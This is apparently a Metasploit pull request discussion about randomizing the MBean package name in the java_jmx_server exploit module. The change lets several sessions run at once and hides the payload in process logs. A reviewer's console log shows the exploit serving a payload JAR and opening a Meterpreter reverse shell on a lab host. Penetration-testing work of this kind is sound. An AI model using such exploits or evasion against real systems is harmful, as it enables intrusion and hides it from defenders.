Java JMX Package Name Randomization

[sgorbaty]

This change randomizes the MBean package name inside the jar.

This achieves two goals:

A. Most importantly, this allows multiple session from the same exploit to work at once. This is needed if the attacker's IP has changed or there is a collaborator attempting to get a shell.
Previously, without package name randomization, the exploit would fail because the IP address is packaged within the JAR and once loaded by the JVM, would not be reloaded again since a package+ class combo is already loaded.

B. This allows the payload to be a little more stealthy and not stand out like a sore thumb in the process logs.

[wchen-r7]

Works for me:

msf5 exploit(multi/misc/java_jmx_server) > run

[*] Started reverse TCP handler on 172.16.249.1:4444 
[*] 172.16.249.141:1617 - Using URL: http://0.0.0.0:8080/pFtEoN
[*] 172.16.249.141:1617 - Local IP: http://x.x.x.x:8080/pFtEoN
[*] 172.16.249.141:1617 - Sending RMI Header...
[*] 172.16.249.141:1617 - Discovering the JMXRMI endpoint...
[+] 172.16.249.141:1617 - JMXRMI endpoint on 172.16.249.141:49212
[*] 172.16.249.141:1617 - Proceeding with handshake...
[+] 172.16.249.141:1617 - Handshake with JMX MBean server on 172.16.249.141:49212
[*] 172.16.249.141:1617 - Loading payload...
[*] 172.16.249.141:1617 - Replied to request for mlet
[*] 172.16.249.141:1617 - Replied to request for payload JAR
[*] 172.16.249.141:1617 - Executing payload...
[*] Sending stage (53859 bytes) to 172.16.249.141
[*] Meterpreter session 1 opened (172.16.249.1:4444 -> 172.16.249.141:49221) at 2018-07-02 13:38:48 -0500

meterpreter >

[wchen-r7]

Release Notes

This improves evasion for exploits/multi/misc/java_jmx_server, by randomizing the package name.